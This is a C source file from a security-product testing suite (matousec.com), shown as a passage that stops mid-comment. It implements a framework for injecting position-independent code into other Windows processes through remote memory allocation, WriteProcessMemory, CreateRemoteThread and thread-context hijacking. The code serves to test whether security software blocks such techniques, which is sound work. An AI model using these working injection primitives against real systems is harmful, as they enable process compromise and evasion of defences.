/*

 Security Software Testing Suite - Universal testing function shared code library
 Copyright by www.matousec.com, Different Internet Experience Ltd.
 http://www.matousec.com/

 This library makes it easy to write testing programs that use injection techniques.

*/

#include <windows.h>
#include <stdio.h>
#include <winsock.h>
#include <wininet.h>
#include <ddk/ntapi.h>
#include "ntinternals.h"
#include "common.h"
#include "common-univ.h"

int com_univ_init(ULONG flags,char *name,int jobs_count,PCOM_UNIV_JOB *jobs,PCOM_UNIV *univ,PCOM_ERROR err_inf);
void com_univ_finit(PCOM_UNIV univ);
int com_univ_job_init(int actions_count,size_t stack_size,int stack_items_count,PCOM_UNIV_JOB *job,PCOM_ERROR err_inf);
void com_univ_job_finit(PCOM_UNIV_JOB job);
void com_univ_job_action_set(PCOM_UNIV_JOB job,int action_idx,int min_action,COM_UNIV_ACTION_FUNC func);
void com_univ_job_action_set_arg(PCOM_UNIV_JOB job,int action_idx,int min_action,COM_UNIV_ACTION_FUNC_ARG func,int arg);

void com_univ_code_block(void);
int com_univ_job_stack_push(PCOM_UNIV univ,PCOM_UNIV_JOB job,void *item_data,size_t item_size);
int com_univ_job_stack_pop(PCOM_UNIV univ,PCOM_UNIV_JOB job,void **item_data,size_t *item_size);
int com_univ_job_stack_get(PCOM_UNIV univ,PCOM_UNIV_JOB job,int item_index,void **item_data,size_t *item_size);
int WINAPI com_univ_job_stack_push_copy(PCOM_UNIV univ,PCOM_UNIV_JOB job,int item_index);
int WINAPI com_univ_load_second_dll(PCOM_UNIV univ,PCOM_UNIV_JOB job);
int WINAPI com_univ_job_stack_remove(PCOM_UNIV univ,PCOM_UNIV_JOB job);
int WINAPI com_univ_handle_obtain_create_process(PCOM_UNIV univ,PCOM_UNIV_JOB job);
int WINAPI com_univ_handle_obtain_open_process(PCOM_UNIV univ,PCOM_UNIV_JOB job);
int WINAPI com_univ_handle_obtain_open_thread(PCOM_UNIV univ,PCOM_UNIV_JOB job);
int WINAPI com_univ_handle_close(PCOM_UNIV univ,PCOM_UNIV_JOB job);
int WINAPI com_univ_structure_alloc_write(PCOM_UNIV univ,PCOM_UNIV_JOB job);
int WINAPI com_univ_structure_start_resume_thread(PCOM_UNIV univ,PCOM_UNIV_JOB job);
int WINAPI com_univ_structure_start_create_remote_thread(PCOM_UNIV univ,PCOM_UNIV_JOB job);
int WINAPI com_univ_structure_start_set_context_thread(PCOM_UNIV univ,PCOM_UNIV_JOB job);
int WINAPI com_univ_structure_cleanup_set_context_thread(PCOM_UNIV univ,PCOM_UNIV_JOB job);
int WINAPI com_univ_infect_rewrite_entry(PCOM_UNIV univ,PCOM_UNIV_JOB job);
int WINAPI com_univ_suspend_current_thread(PCOM_UNIV univ,PCOM_UNIV_JOB job);
int WINAPI com_univ_client_init(PCOM_UNIV univ,PCOM_UNIV_JOB job);
int WINAPI com_univ_client_finit(PCOM_UNIV univ,PCOM_UNIV_JOB job);
int WINAPI com_univ_client_send_result(PCOM_UNIV univ,PCOM_UNIV_JOB job);
int WINAPI com_univ_client_send_result_error(PCOM_UNIV univ,PCOM_UNIV_JOB job);
int WINAPI com_univ_wait_mapping_event_handle(PCOM_UNIV univ,PCOM_UNIV_JOB job);
int WINAPI com_univ_inet_sock_http(PCOM_UNIV univ,PCOM_UNIV_JOB job);
int WINAPI com_univ_inet_sock_dns(PCOM_UNIV univ,PCOM_UNIV_JOB job);
int WINAPI com_univ_terminate_process(PCOM_UNIV univ,PCOM_UNIV_JOB job);
int WINAPI com_univ_server_init(PCOM_UNIV univ,PCOM_UNIV_JOB job) __attribute__((noinline));
int WINAPI com_univ_server_finit(PCOM_UNIV univ,PCOM_UNIV_JOB job) __attribute__((noinline));
DWORD WINAPI com_univ_main(PCOM_UNIV univ);
void com_univ_code_block_end(void);

int com_univ_job_stack_init_push(PCOM_UNIV_JOB job,void *item_data,size_t item_size);

int com_univ_server_init_external(PCOM_UNIV univ,PCOM_UNIV_JOB job);
int com_univ_server_finit_external(PCOM_UNIV univ,PCOM_UNIV_JOB job);

void com_univ_inet_sock_http_init(struct sockaddr_in *host,char *data,size_t len,PCOM_CONF conf);

void com_univ_server_err_report(PCOM_UNIV univ,PCOM_ERROR err_inf);



/*
 Allocates and initializes an universal testing structure.

 'flags' Specifies universal components to be initialized. It is a combination of COM_UNIV_INIT_FLAG_* values.
 'name' A name of the test with an optional suffix.
 'jobs_count' A number of pointers to universal jobs in 'jobs' array.
 'jobs' An array of pointers to universal jobs.
 'univ' A pointer to a variable that receives a pointer to a newly allocated universal structure.
 'err_inf' A pointer to a structure that will be filled with an error message and a code if an error occurs.

 If the function succeeds the return value is TRUE and 'univ' holds a pointer to the universal structure,
 which should be destroyed using com_univ_finit().
 If the function fails the return value is FALSE.
*/

int com_univ_init(ULONG flags,char *name,int jobs_count,PCOM_UNIV_JOB *jobs,PCOM_UNIV *univ,PCOM_ERROR err_inf)
{
  int res=FALSE;

  size_t jobs_size=(sizeof(COM_UNIV_JOB)+sizeof(PCOM_UNIV_JOB))*jobs_count;
  for (int i=0;i<jobs_count;i++)
    jobs_size+=jobs[i]->size;

  size_t size=sizeof(COM_UNIV)+jobs_size+(size_t)com_univ_code_block_end-(size_t)com_univ_code_block;
  PCOM_UNIV loc_univ=malloc(size);
  if (loc_univ)
  {
    memset(loc_univ,0,size);
    loc_univ->size=size;
    loc_univ->code_block_offset=sizeof(COM_UNIV)+jobs_size;
    loc_univ->error.occurred=FALSE;
    loc_univ->error.code_system=0;
    loc_univ->error.code=ERROR_SUCCESS;
    loc_univ->error.job_index=COM_UNIV_ERR_NO_JOB;
    char *code_block=(char*)((size_t)loc_univ+loc_univ->code_block_offset);
    memcpy(code_block,com_univ_code_block,(size_t)com_univ_code_block_end-(size_t)com_univ_code_block);

    // initialization of jobs
    PCOM_UNIV_JOB job=(PCOM_UNIV_JOB)&loc_univ->jobs_offset[jobs_count];

    loc_univ->job_index=0;
    loc_univ->jobs_count=jobs_count;
    for (int i=0;i<jobs_count;i++)
    {
      loc_univ->jobs_offset[i]=(size_t)job-(size_t)loc_univ;
      memcpy(job,jobs[i],jobs[i]->size);
      job->index=i;
      job=(PCOM_UNIV_JOB)((size_t)job+jobs[i]->size);
    }

    // initialization of mapping and event name
    snprintf(loc_univ->mapping_name,sizeof(loc_univ->mapping_name),"%s%s%s",COM_MAPPING_PREFIX,name,COM_MAPPING_SUFFIX);
    loc_univ->mapping_name[sizeof(loc_univ->mapping_name)-1]='\0';
    snprintf(loc_univ->mapping_event_name,sizeof(loc_univ->mapping_event_name),"%s%s%s",COM_EVENT_PREFIX,name,COM_EVENT_SUFFIX);
    loc_univ->mapping_event_name[sizeof(loc_univ->mapping_event_name)-1]='\0';


    // initialization of important kernel functions
    if (!err_inf->occurred)
    {
      HMODULE kernel32_mod=LoadLibrary("kernel32.dll");

      if (kernel32_mod)
      {
        int i=0;
        #define gpa_rva(m,f) loc_univ->kernel32_offsets[i]=(size_t)GetProcAddress(m,#f)-(size_t)m; \
                             loc_univ->kernel32.f=(void*)(loc_univ->kernel32_offsets[i++]);
        gpa_rva(kernel32_mod,CloseHandle);
        gpa_rva(kernel32_mod,CreateProcessA);
        gpa_rva(kernel32_mod,CreateRemoteThread);
        gpa_rva(kernel32_mod,ExitProcess);
        gpa_rva(kernel32_mod,ExitThread);
        gpa_rva(kernel32_mod,GetLastError);
        gpa_rva(kernel32_mod,GetThreadContext);
        gpa_rva(kernel32_mod,LoadLibraryA);
        gpa_rva(kernel32_mod,MapViewOfFile);
        gpa_rva(kernel32_mod,OpenEventA);
        gpa_rva(kernel32_mod,OpenFileMappingA);
        gpa_rva(kernel32_mod,OpenProcess);
        gpa_rva(kernel32_mod,OpenThread);
        gpa_rva(kernel32_mod,ResumeThread);
        gpa_rva(kernel32_mod,SetEvent);
        gpa_rva(kernel32_mod,SetThreadContext);
        gpa_rva(kernel32_mod,Sleep);
        gpa_rva(kernel32_mod,SuspendThread);
        gpa_rva(kernel32_mod,TerminateProcess);
        gpa_rva(kernel32_mod,UnmapViewOfFile);
        gpa_rva(kernel32_mod,VirtualAllocEx);
        gpa_rva(kernel32_mod,VirtualFreeEx);
        gpa_rva(kernel32_mod,WaitForMultipleObjects);
        gpa_rva(kernel32_mod,WriteProcessMemory);
        #undef gpa_rva
      } else com_err_set(err_inf,"Unable to load \"kernel32.dll\".\n");
    }

    // initialization of important Winsock functions
    if (!err_inf->occurred && (flags & COM_UNIV_INIT_FLAG_WS2_32))
    {
      lstrcpynA(loc_univ->second_dll_name,"ws2_32.dll",sizeof(loc_univ->second_dll_name));
      HMODULE ws2_32_mod=LoadLibrary("ws2_32.dll");
      if (ws2_32_mod)
      {
        int i=0;
        loc_univ->second_dll_func_count=0;
        #define gpa_rva(m,f) loc_univ->ws2_32_offsets[i]=(size_t)GetProcAddress(m,#f)-(size_t)m; \
                             loc_univ->ws2_32.f=(void*)(loc_univ->ws2_32_offsets[i++]); \
                             loc_univ->second_dll_func_count++;
        gpa_rva(ws2_32_mod,closesocket);
        gpa_rva(ws2_32_mod,connect);
        gpa_rva(ws2_32_mod,ioctlsocket);
        gpa_rva(ws2_32_mod,recv);
        gpa_rva(ws2_32_mod,recvfrom);
        gpa_rva(ws2_32_mod,select);
        gpa_rva(ws2_32_mod,send);
        gpa_rva(ws2_32_mod,sendto);
        gpa_rva(ws2_32_mod,socket);
        gpa_rva(ws2_32_mod,WSACleanup);
        gpa_rva(ws2_32_mod,WSAStartup);
        #undef gpa_rva
      } else com_err_set(err_inf,"Unable to load \"ws2_32.dll\".\n");
    }

    res=!err_inf->occurred;
    if (res) *univ=loc_univ;

    if (!res) free(loc_univ);
  } else com_err_set_nc(err_inf,"Unable to allocate %d bytes of memory.\n",size);

  return res;
}


/*
 Frees resources used by a universal structure.

 'univ' A pointer to the universal structure to be destroyed.
*/

void com_univ_finit(PCOM_UNIV univ)
{
  free(univ);
  return;
}


/*
 Allocates and initializes a universal job structure.

 'actions_count' A number of actions to be allocated in the job.
 'stack_size' A size of the job's stack in bytes.
 'stack_items_count' A maximum number of items to be pushed on the stack.
 'job' A pointer to a variable that receives a pointer to a newly allocated universal job.
 'err_inf' A pointer to a structure that will be filled with an error message and a code if an error occurs.

 If the function succeeds the return value is TRUE and 'job' holds a pointer to the universal job,
 which should be destroyed using com_univ_job_finit().
 If the function fails the return value is FALSE.
*/

int com_univ_job_init(int actions_count,size_t stack_size,int stack_items_count,PCOM_UNIV_JOB *job,PCOM_ERROR err_inf)
{
  int res=FALSE;

  size_t alignment=stack_size % sizeof(int) ? sizeof(int)-(stack_size % sizeof(int)) : 0;
  stack_size+=alignment;

  size_t size=sizeof(COM_UNIV_JOB)+actions_count*sizeof(COM_UNIV_ACTION)+stack_items_count*sizeof(COM_UNIV_JOB_STACK_ITEM)+stack_size;
  PCOM_UNIV_JOB loc_job=malloc(size);
  if (loc_job)
  {
    memset(loc_job,0,size);

    loc_job->size=size;
    loc_job->offset_base=NULL;
    loc_job->stack.size_total=stack_size;
    loc_job->stack.size_free=stack_size;
    loc_job->stack.top=0;
    loc_job->stack.max_items=stack_items_count;
    loc_job->stack.items_offset=sizeof(COM_UNIV_JOB)+actions_count*sizeof(COM_UNIV_ACTION);
    loc_job->stack.buffer_offset=loc_job->stack.items_offset+stack_items_count*sizeof(COM_UNIV_JOB_STACK_ITEM);
    loc_job->actions_count=actions_count;

    res=TRUE;

    if (!res) free(loc_job);
  } else com_err_set_nc(err_inf,"Unable to allocate %d bytes of memory.\n",size);

  if (res) *job=loc_job;

  return res;
}


/*
 Frees resources used by a universal structure.

 'job' A pointer to the universal job to be destroyed.
*/

void com_univ_job_finit(PCOM_UNIV_JOB job)
{
  free(job);
  return;
}


/*
 Sets an action of the universal job.

 'job' A pointer to the universal job.
 'action_idx' An index of the job's action to be set.
 'min_action' The action is executed only if all actions up to the action with index='min_index' succeeded,
 -1 means that the action is always executed.
 'func' A function that realizes the action.
*/

void com_univ_job_action_set(PCOM_UNIV_JOB job,int action_idx,int min_action,COM_UNIV_ACTION_FUNC func)
{
  job->actions[action_idx].min_index=min_action;
  job->actions[action_idx].func_offset=(size_t)func-(size_t)com_univ_code_block;
  job->actions[action_idx].argument_present=FALSE;
  job->actions[action_idx].argument=0;
  return;
}


/*
 Sets an action of the universal job with a user defined argument.

 'job' A pointer to the universal job.
 'action_idx' An index of the job's action to be set.
 'min_action' The action is executed only if all actions up to the action with index='min_index' succeeded,
 -1 means that the action is always executed.
 'func' A function that realizes the action.
 'arg' The user defined argument that is passed to the function.
*/

void com_univ_job_action_set_arg(PCOM_UNIV_JOB job,int action_idx,int min_action,COM_UNIV_ACTION_FUNC_ARG func,int arg)
{
  job->actions[action_idx].min_index=min_action;
  job->actions[action_idx].func_offset=(size_t)func-(size_t)com_univ_code_block;
  job->actions[action_idx].argument_present=TRUE;
  job->actions[action_idx].argument=arg;
  return;
}



/*
 The block of position independent functions follows.
 This code is designed to be easily inserted into a remote process and executed.
*/

void com_univ_code_block(void) {};


/*
 Fills error information values of the universal structure with the current
 thread's last error code and a universal error code.

 'univ' A pointer to the universal structure.
 'index' An index of the job in which the error occurred.
 'ucode' The universal error code - one of COM_UNIV_ERR_* values.
*/

#define com_univ_err_set(univ,index,ucode)                                      \
({                                                                              \
  univ->error.occurred=TRUE;                                                    \
  univ->error.code_system=univ->kernel32.GetLastError();                        \
  univ->error.code=ucode;                                                       \
  univ->error.job_index=index;                                                  \
})


/*
 Fills error information values of the universal structure with a universal error code.

 'univ' A pointer to the universal structure.
 'index' An index of the job in which the error occurred.
 'ucode' The universal error code - one of COM_UNIV_ERR_* values.
*/

#define com_univ_err_set_nc(univ,index,ucode)                                   \
({                                                                              \
  univ->error.occurred=TRUE;                                                    \
  univ->error.code=ucode;                                                       \
  univ->error.job_index=index;                                                  \
})


/*
 Fills error information values of the universal structure with a given system error code
 and a universal error code.

 'univ' A pointer to the universal structure.
 'index' An index of the job in which the error occurred.
 'scode' The system error code.
 'ucode' The universal error code - one of COM_UNIV_ERR_* values.
*/

#define com_univ_err_set_sc(univ,index,scode,ucode)                             \
({                                                                              \
  univ->error.occurred=TRUE;                                                    \
  univ->error.code_system=scode;                                                \
  univ->error.code=ucode;                                                       \
  univ->error.job_index=index;                                                  \
})



/*
 Finds "kernel32.dll" module and fixes pointers of "kernel32.dll" functions in the universal structure.

 'univ' A pointer to the universal structure.

 If the function succeeds the return value is TRUE, otherwise it is FALSE.
*/

#define com_univ_fix_func_kernel(univ)                                          \
({                                                                              \
  HMODULE kernel32_mod=com_get_base(COM_HASH_KERNEL32_DLL);                     \
  if (kernel32_mod)                                                             \
  {                                                                             \
    void** func_array=(void**)(&univ->kernel32);                                \
    for (int i=0;i<sizeof(COM_UNIV_FUNC_KERNEL32)/sizeof(void*);i++)            \
      func_array[i]=(void*)((size_t)kernel32_mod+univ->kernel32_offsets[i]);    \
  } else com_univ_err_set_nc(univ,COM_UNIV_ERR_NO_JOB,COM_UNIV_ERR_FIX_FUNC_KERNEL_GET_BASE);       \
                                                                                \
  kernel32_mod!=NULL;                                                           \
})


/*
 Fills a buffer with null characters.

 'buffer' A pointer to the buffer to be filled.
 'size' A size of the buffer in bytes.
*/

#define com_univ_memzero(buffer,size)                                           \
({                                                                              \
  for (char *q=(char*)(buffer);q<(char*)(buffer)+size;q++)                      \
    *q='\0';                                                                    \
})


/*
 Copies bytes from a buffer to another one.

 'dst' A pointer to the destination buffer.
 'src' A pointer to the source buffer.
 'size' A number of bytes to be copied.
*/

#define com_univ_memcpy(dst,src,size)                                           \
({                                                                              \
  for (char *q=(char*)(dst),*p=(char*)(src);q<(char*)(dst)+size;q++,p++)        \
    *q=*p;                                                                      \
})



/*
 Returns a pointer to the job's stack items.

 'job' A pointer to the universal job.

 The return value is a pointer on the first universal stack item in the job's stack.
*/

#define com_univ_job_stack_items_get(job) (PCOM_UNIV_JOB_STACK_ITEM)((size_t)job+job->stack.items_offset)


/*
 Returns a pointer to the job's stack data buffer.

 'job' A pointer to the universal job.

 The return value is a pointer on the first byte of the job's stack data item.
*/

#define com_univ_job_stack_buffer_get(job) (char*)((size_t)job+job->stack.buffer_offset)


/*
 Pushes an item on the stack.

 'univ' A pointer to the universal structure.
 'job' A pointer to the universal job.
 'item_data' A stack item to push on the stack.
 'item_size' A size of the item in bytes.

 If the function succeeds the return value is TRUE, otherwise it is FALSE.
*/

int com_univ_job_stack_push(PCOM_UNIV univ,PCOM_UNIV_JOB job,void *item_data,size_t item_size)
{
  int res=FALSE;

  if ((item_size<=job->stack.size_free) && (job->stack.top<job->stack.max_items))
  {
    PCOM_UNIV_JOB_STACK_ITEM items=com_univ_job_stack_items_get(job);
    char *buffer=com_univ_job_stack_buffer_get(job);

    items[job->stack.top].size=item_size;
    items[job->stack.top].data_offset=job->stack.size_total-job->stack.size_free;
    com_univ_memcpy(&buffer[items[job->stack.top].data_offset],item_data,item_size);

    job->stack.size_free-=item_size;
    job->stack.top++;

    res=TRUE;
  } else if (univ) com_univ_err_set_nc(univ,job->index,COM_UNIV_ERR_JOB_STACK_PUSH_STACK_FULL);

  return res;
}


/*
 Pops an item from the stack.

 'univ' A pointer to the universal structure.
 'job' A pointer to the universal job.
 'item_data' A pointer to a variable that receives a pointer to the popped data. This argument can be NULL.
 'item_size' A pointer to a variable that receives a size of the popped item. This argument can be NULL.

 If the function succeeds the return value is TRUE, otherwise it is FALSE.
*/

int com_univ_job_stack_pop(PCOM_UNIV univ,PCOM_UNIV_JOB job,void **item_data,size_t *item_size)
{
  int res=FALSE;

  if (job->stack.top>0)
  {
    PCOM_UNIV_JOB_STACK_ITEM items=com_univ_job_stack_items_get(job);
    char *buffer=com_univ_job_stack_buffer_get(job);
    job->stack.top--;

    if (item_size) *item_size=items[job->stack.top].size;
    if (item_data) *item_data=&buffer[items[job->stack.top].data_offset];

    job->stack.size_free+=items[job->stack.top].size;

    res=TRUE;
  } else com_univ_err_set_nc(univ,job->index,COM_UNIV_ERR_JOB_STACK_POP_STACK_EMPTY);

  return res;
}


/*
 Returns a stack item without popping it.

 'univ' A pointer to the universal structure.
 'job' A pointer to the universal job.
 'item_index' An index of the item to obtain.
 'item_data' A pointer to a variable that receives a pointer to the popped data. This argument can be NULL.
 'item_size' A pointer to a variable that receives a size of the popped item. This argument can be NULL.

 If the function succeeds the return value is TRUE, otherwise it is FALSE.
*/

int com_univ_job_stack_get(PCOM_UNIV univ,PCOM_UNIV_JOB job,int item_index,void **item_data,size_t *item_size)
{
  int res=FALSE;

  if ((item_index>=0) && (item_index<job->stack.top))
  {
    PCOM_UNIV_JOB_STACK_ITEM items=com_univ_job_stack_items_get(job);
    char *buffer=com_univ_job_stack_buffer_get(job);

    if (item_size) *item_size=items[item_index].size;
    if (item_data) *item_data=&buffer[items[item_index].data_offset];

    res=TRUE;
  } else com_univ_err_set_nc(univ,job->index,COM_UNIV_ERR_JOB_STACK_GET_INDEX_INVALID);

  return res;
}


/*
 Returns the universal job's stack top.

 'job' A pointer to the universal job.

 The return value is an index of the stack top item.
*/

#define com_univ_job_stack_top_get(job) job->stack.top;


/*
 Pushes on the stack a copy of an item from the stack.

 'univ' A pointer to the universal structure.
 'job' A pointer to the universal job.
 'item_index' An index of the item to copy and push. A positive index values are absolute stack
 positions, negative index values are relative to the stack top.

 If the function succeeds the return value is TRUE, otherwise it is FALSE.
*/

int WINAPI com_univ_job_stack_push_copy(PCOM_UNIV univ,PCOM_UNIV_JOB job,int item_index)
{
  int idx=item_index>=0 ? item_index : job->stack.top+item_index;
  void *item=NULL;
  size_t size=0;
  int res=univ->job_stack_get(univ,job,idx,&item,&size)
       && univ->job_stack_push(univ,job,item,size);
/*
FALSE;

  if ((item_index>=0) && (item_index<job->stack.top))
  {
    if ((index<job->stack.max_items) && (item_size<job->stack.size_free))
    {
      PCOM_UNIV_JOB_STACK_ITEM items=com_univ_job_stack_items_get(job);
      char *buffer=com_univ_job_stack_buffer_get(job);

      size_t item_size=items[item_index].size;
      if

      items[job->stack.top].size=item_size;
      items[job->stack.top].data_offset=job->stack.size_total-job->stack.size_free;
      com_univ_memcpy(&buffer[items[job->stack.top].data_offset],&buffer[items[item_index].data_offset],item_size);

      job->stack.size_free-=item_size;
      job->stack.top++;

      res=TRUE;
    } else com_univ_err_set_nc(univ,job->index,COM_UNIV_ERR_JOB_STACK_PUSH_COPY_STACK_FULL);
  } else com_univ_err_set_nc(univ,job->index,COM_UNIV_ERR_JOB_STACK_PUSH_COPY_INDEX_INVALID);
  */
  return res;
}



/*
 Finds current job inside the universal structure.

 'univ' A pointer to the universal structure.

 The return value is a pointer to the current job.
*/

#define com_univ_job_get(univ) (PCOM_UNIV_JOB)(univ->jobs_offset[univ->job_index]+(size_t)univ);


/*
 Calls stdcall function with 2 arguments.

 'func' A function to be called.
 'arg1' The first function argument.
 'arg1' The second function argument.

 The return value is the return value of the called function.
*/

#define com_univ_external_call(func,arg1,arg2)                                  \
({                                                                              \
  int res;                                                                      \
  __asm__                                                                       \
  (                                                                             \
    "push %[a2]                         \n"                                     \
    "push %[a1]                         \n"                                     \
    "call %[f]                          \n"                                     \
    "mov %[res],eax                     \n"                                     \
    : [res] "+m" (res)                                                          \
    : [f] "r" (func),                                                           \
      [a1] "m" (arg1),                                                          \
      [a2] "m" (arg2)                                                           \
  );                                                                            \
  res;                                                                          \
})


/*
 Loads a second DLL and fixes its imports.

 'univ' A pointer to the universal structure.
 'job' A pointer to the universal job.

 If the function succeeds the return value is TRUE, otherwise it is FALSE.
*/

int WINAPI com_univ_load_second_dll(PCOM_UNIV univ,PCOM_UNIV_JOB job)
{
  int res=FALSE;

  if (univ->second_dll_name[0])
  {
    HANDLE mod=univ->kernel32.LoadLibraryA(univ->second_dll_name);
    if (mod)
    {
      res=TRUE;
      for (int i=0;i<univ->second_dll_func_count;i++)
        univ->second_dll_pointers[i]=(void*)((size_t)mod+univ->second_dll_offsets[i]);

    } else com_univ_err_set(univ,job->index,COM_UNIV_ERR_LOAD_SECOND_DLL_LOAD_LIBRARY);
  } else com_univ_err_set(univ,job->index,COM_UNIV_ERR_LOAD_SECOND_DLL_INVALID_DLL_NAME);

  return res;
}


/*
 Removes an item from the top of the stack.

 'univ' A pointer to the universal structure.
 'job' A pointer to the universal job.

 Stack input:
   top-1: The item to remove.

 Stack output:
   Empty.


 If the function succeeds the return value is TRUE, otherwise it is FALSE.
*/

int WINAPI com_univ_job_stack_remove(PCOM_UNIV univ,PCOM_UNIV_JOB job)
{
  int res=univ->job_stack_pop(univ,job,NULL,NULL);

  if (!res) com_univ_err_set_nc(univ,job->index,COM_UNIV_ERR_JOB_STACK_REMOVE_STACK_EMPTY);

  return res;
}


/*
 Creates a new process and returns handles to it and its main thread.

 'univ' A pointer to the universal structure.
 'job' A pointer to the universal job.

 Stack input:
   top-1: Null terminated string that specifies the command line to execute
          (see 'lpCommandLine' argument of CreateProcess API).
   top-2: Creation flags (see 'dwCreationFlags' argument of CreateProcess API).

 Stack output:
   top-1: Process handle.
   top-2: Thread handle.


 If the function succeeds the return value is TRUE, otherwise it is FALSE.
*/

int WINAPI com_univ_handle_obtain_create_process(PCOM_UNIV univ,PCOM_UNIV_JOB job)
{
  int res=FALSE;

  char *cmdline=NULL;
  DWORD *pflags=NULL;
  if (univ->job_stack_pop(univ,job,(void*)&cmdline,NULL) && univ->job_stack_pop(univ,job,(void*)&pflags,NULL))
  {
    DWORD flags=*pflags;
    STARTUPINFO si;
    com_univ_memzero(&si,sizeof(si));
    si.cb=sizeof(si);
    PROCESS_INFORMATION pi;

    if (univ->kernel32.CreateProcessA(NULL,cmdline,NULL,NULL,FALSE,flags,NULL,NULL,&si,&pi))
    {
      res=univ->job_stack_push(univ,job,&pi.hThread,sizeof(pi.hThread))
       && univ->job_stack_push(univ,job,&pi.hProcess,sizeof(pi.hProcess));
    } else com_univ_err_set(univ,job->index,COM_UNIV_ERR_HANDLE_OBTAIN_CREATE_PROCESS_CREATE_PROCESS);
  }

  return res;
}


/*
 Opens existing process and returns a handle to it.

 'univ' A pointer to the universal structure.
 'job' A pointer to the universal job.

 Stack input:
   top-1: Process identifier (see 'dwProcessId' argument of OpenProcess API).
   top-2: Access rights (see 'dwDesiredAccess' argument of OpenProcess API).

 Stack output:
   top-1: Process handle.


 If the function succeeds the return value is TRUE, otherwise it is FALSE.
*/

int WINAPI com_univ_handle_obtain_open_process(PCOM_UNIV univ,PCOM_UNIV_JOB job)
{
  int res=FALSE;

  DWORD *ppid=NULL,*paccess=NULL;
  if (univ->job_stack_pop(univ,job,(void*)&ppid,NULL) && univ->job_stack_pop(univ,job,(void*)&paccess,NULL))
  {
    DWORD pid=*ppid;
    DWORD access=*paccess;

    HANDLE process=univ->kernel32.OpenProcess(access,FALSE,pid);
    if (process)
    {
      res=univ->job_stack_push(univ,job,&process,sizeof(process));
    } else com_univ_err_set(univ,job->index,COM_UNIV_ERR_HANDLE_OBTAIN_OPEN_PROCESS_OPEN_PROCESS);
  }

  return res;
}


/*
 Opens existing thread and returns a handle to it.

 'univ' A pointer to the universal structure.
 'job' A pointer to the universal job.

 Stack input:
   top-1: Thread identifier (see 'dwThreadId' argument of OpenThread API).
   top-2: Access rights (see 'dwDesiredAccess' argument of OpenThread API).

 Stack output:
   top-1: Thread handle.


 If the function succeeds the return value is TRUE, otherwise it is FALSE.
*/

int WINAPI com_univ_handle_obtain_open_thread(PCOM_UNIV univ,PCOM_UNIV_JOB job)
{
  int res=FALSE;

  DWORD *ptid=NULL,*paccess=NULL;
  if (univ->job_stack_pop(univ,job,(void*)&ptid,NULL) && univ->job_stack_pop(univ,job,(void*)&paccess,NULL))
  {
    DWORD tid=*ptid;
    DWORD access=*paccess;
    HANDLE thread=univ->kernel32.OpenThread(access,FALSE,tid);
    if (thread)
    {
      res=univ->job_stack_push(univ,job,&thread,sizeof(thread));
    } else com_univ_err_set(univ,job->index,COM_UNIV_ERR_HANDLE_OBTAIN_OPEN_THREAD_OPEN_THREAD);
  }

  return res;
}


/*
 Pops and closes a handle from the stack.

 'univ' A pointer to the universal structure.
 'job' A pointer to the universal job.

 Stack input:
   top-1: Handle.

 Stack output:
   Empty.


 If the function succeeds the return value is TRUE, otherwise it is FALSE.
*/

int WINAPI com_univ_handle_close(PCOM_UNIV univ,PCOM_UNIV_JOB job)
{
  int res=FALSE;

  HANDLE *phandle=NULL;
  if (univ->job_stack_pop(univ,job,(void*)&phandle,NULL))
  {
    HANDLE handle=*phandle;
    res=univ->kernel32.CloseHandle(handle);
  }

  return res;
}


/*
 Allocates and writes the universal structure into the target process.

 'univ' A pointer to the universal structure.
 'job' A pointer to the universal job.

 Stack input:
   top-1: Process handle.

 Stack output:
   top-1: Pointer to the universal structure in the target process.

 If the function succeeds the return value is TRUE, otherwise it is FALSE.
*/

int WINAPI com_univ_structure_alloc_write(PCOM_UNIV univ,PCOM_UNIV_JOB job)
{
  int res=FALSE;

  HANDLE *pprocess=NULL;
  if (univ->job_stack_pop(univ,job,(void*)&pprocess,NULL))
  {
    HANDLE process=*pprocess;
    void* mem=univ->kernel32.VirtualAllocEx(process,NULL,univ->size,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
    if (mem)
    {
      res=univ->kernel32.WriteProcessMemory(process,mem,univ,univ->size,NULL);
      if (res)
      {
        res=univ->job_stack_push(univ,job,&mem,sizeof(mem));
      } else com_univ_err_set(univ,job->index,COM_UNIV_ERR_STRUCTURE_ALLOC_WRITE_WRITE_PROCESS_MEMORY);

      if (!res) univ->kernel32.VirtualFreeEx(process,mem,0,MEM_RELEASE);
    } else com_univ_err_set(univ,job->index,COM_UNIV_ERR_STRUCTURE_ALLOC_WRITE_VIRTUAL_ALLOC_EX);
  }

  return res;
}


/*
 Resumes a thread.

 'univ' A pointer to the universal structure.
 'job' A pointer to the universal job.

 Stack input:
   top-1: Thread handle.

 Stack output:
   Empty.

 If the function succeeds the return value is TRUE, otherwise it is FALSE.
*/

int WINAPI com_univ_structure_start_resume_thread(PCOM_UNIV univ,PCOM_UNIV_JOB job)
{
  int res=FALSE;

  HANDLE *pthread=NULL;
  if (univ->job_stack_pop(univ,job,(void*)&pthread,NULL))
  {
    HANDLE thread=*pthread;
    res=univ->kernel32.ResumeThread(thread)!=-1;

    if (!res) com_univ_err_set(univ,job->index,COM_UNIV_ERR_STRUCTURE_START_RESUME_THREAD_RESUME_THREAD);
  }

  return res;
}


/*
 Creates a remote thread pointed to com_univ_main() in the target process.

 'univ' A pointer to the universal structure.
 'job' A pointer to the universal job.

 Stack input:
   top-1: Pointer to the universal structure in the target process.
   top-2: Process handle.

 Stack output:
   top-1: Thread handle.

 If the function succeeds the return value is TRUE, otherwise it is FALSE.
*/

int WINAPI com_univ_structure_start_create_remote_thread(PCOM_UNIV univ,PCOM_UNIV_JOB job)
{
  int res=FALSE;

  void **pmem=NULL;
  HANDLE *pprocess=NULL;
  if (univ->job_stack_pop(univ,job,(void*)&pmem,NULL)
   && univ->job_stack_pop(univ,job,(void*)&pprocess,NULL))
  {
    void *mem=*pmem;
    HANDLE process=*pprocess;
    void* main_ptr=(void*)((size_t)mem+univ->code_block_offset+(size_t)com_univ_main-(size_t)com_univ_code_block);
    DWORD tid;
    HANDLE thread=univ->kernel32.CreateRemoteThread(process,NULL,0,main_ptr,mem,0,&tid);
    if (thread)
    {
      res=univ->job_stack_push(univ,job,&thread,sizeof(thread));

      if (!res) univ->kernel32.CloseHandle(thread);
    } else com_univ_err_set(univ,job->index,COM_UNIV_ERR_STRUCTURE_START_CREATE_REMOTE_THREAD_CREATE_REMOTE_THREAD);
  }

  return res;
}


/*
 Suspends a thread in the target process and changes its context, so that com_univ_main()
 is executed after the thread is resumed, and resumes the thread.

 'univ' A pointer to the universal structure.
 'job' A pointer to the universal job.

 Stack input:
